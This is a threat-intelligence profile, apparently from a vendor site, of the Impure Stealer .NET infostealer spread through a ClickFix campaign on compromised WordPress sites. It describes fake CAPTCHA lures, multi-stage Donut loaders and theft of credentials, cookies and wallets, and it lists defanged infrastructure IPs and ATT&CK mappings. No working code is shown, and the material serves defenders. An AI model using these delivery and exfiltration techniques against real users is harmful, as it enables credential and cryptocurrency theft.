Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

Impure Stealer

Impure Stealer is a .NET information-stealing malware family identified by Rapid7 during a large ClickFix campaign that used compromised WordPress websites to target primarily Windows systems. In the observed activity, attackers injected malicious JavaScript into legitimate WordPress sites and displayed fake Cloudflare verification or CAPTCHA prompts that instructed victims to copy and paste commands into the Windows Run dialog, resulting in manual execution of a multi-stage, largely in-memory infection chain. Rapid7 reported the broader operation had been active since at least December 2025, with some supporting infrastructure dating to July/August 2025, and involved more than 250 compromised websites across at least 12 countries.

Rapid7 described Impure Stealer as a previously unnamed .NET infostealer and noted that, in one infection chain, it replaced Vidar as the final payload: a second shellcode blob contained an encrypted .NET stealer that researchers named Impure Stealer. The campaign also delivered Vidar Stealer, VodkaStealer, and the DoubleDonut loader. Reported capabilities for the payloads in this campaign, including Impure Stealer, include harvesting browser credentials, authentication cookies, cryptocurrency wallet data, and other sensitive information from infected devices. Rapid7 also characterized the overall campaign goal as theft and exfiltration of credentials and digital wallets.

High-confidence infrastructure and behavioral details tied to the campaign include PowerShell stagers retrieving content from 91.92.240[.]219 and 178.16.53[.]70, downloading shellcode such as cptch.bin and cptchbuild.bin from 94.154.35[.]115, and injecting payloads into svchost.exe. Rapid7 reported that final payload hosting later moved to 172.94.9[.]187 in early March 2026. The campaign used heavily obfuscated JavaScript, anti-analysis checks, localized fake CAPTCHA lures in at least 31 languages, and Donut-based shellcode loaders in a two-stage sequence dubbed DoubleDonut. No specific threat actor attribution for Impure Stealer itself was provided in the content.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1189Drive-by CompromiseEvidence4

Highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge.

Execution

2 techniques
T1059Command and Scripting InterpreterEvidence1

Visitors are instructed to complete the verification by copying and pasting a command into the Windows Run dialog box.

T1204User ExecutionEvidence3

Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands.

Credential Access

4 techniques
T1539Steal Web Session CookieEvidence2

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555Credentials from Password StoresEvidence1

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555.003Credentials from Web BrowsersEvidence1

"...ultimately steals and exfiltrates credentials and digital wallets..."; "...targeting Google Chrome, Microsoft Edge, Brave..."

T1649Steal or Forge Authentication CertificatesEvidence1

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Collection

1 technique
T1005Data from Local SystemEvidence1

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Command and Control

4 techniques
T1071.001Web ProtocolsEvidence1

"Invoke-WebRequest" to retrieve payloads; "...fetch a script..."; "...download a shellcode blob..."

T1104Multi-Stage ChannelsEvidence1

"...multi-stage malware chain..."; "...Donut loader is used twice in sequence..."

T1132.002Non-Standard EncodingEvidence1

"...custom Type-Length-Value (TLV) data encoding... custom network protocol on top of TCP..."

T1573.001Symmetric CryptographyEvidence1

"...AES-256-CBC with a server-provided key for encryption of C2 communication..."

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

"...steals and exfiltrates credentials and digital wallets..." and ATT&CK table listing "T1041 Exfiltration Over C2 Channel"

INDICATORS OF COMPROMISE

IOCs tracked for this family

55 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
17 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
38 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app21 days ago
ip.v4●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app4 months ago
ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
the hacker newsNews
Mar 16, 2026
ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers

A .NET-based stealer used as a payload in ClickFix campaigns leveraging compromised WordPress sites.

Read more
bank info securityNews
Mar 12, 2026
Breach Roundup: Russian State Actors Target Signal, WhatsApp

Information-stealing malware delivered through compromised WordPress sites using ClickFix, designed to steal browser credentials, cookies, cryptocurrency wallet data and other sensitive information.

Read more
govinfosecurityNews
Mar 12, 2026
Breach Roundup: Russian State Actors Target Signal, WhatsApp

Information-stealing malware delivered via ClickFix through compromised WordPress sites; harvests browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information.

Read more
rapid7 blogNews
Mar 9, 2026
When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation

Previously-unnamed .NET infostealer delivered by DoubleDonut; uses custom TLV-like protocol over TCP, AES-256-CBC with a server-provided key for C2 encryption, and a custom string/config decryption routine (distinct from PureLogs).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching55

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping13

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.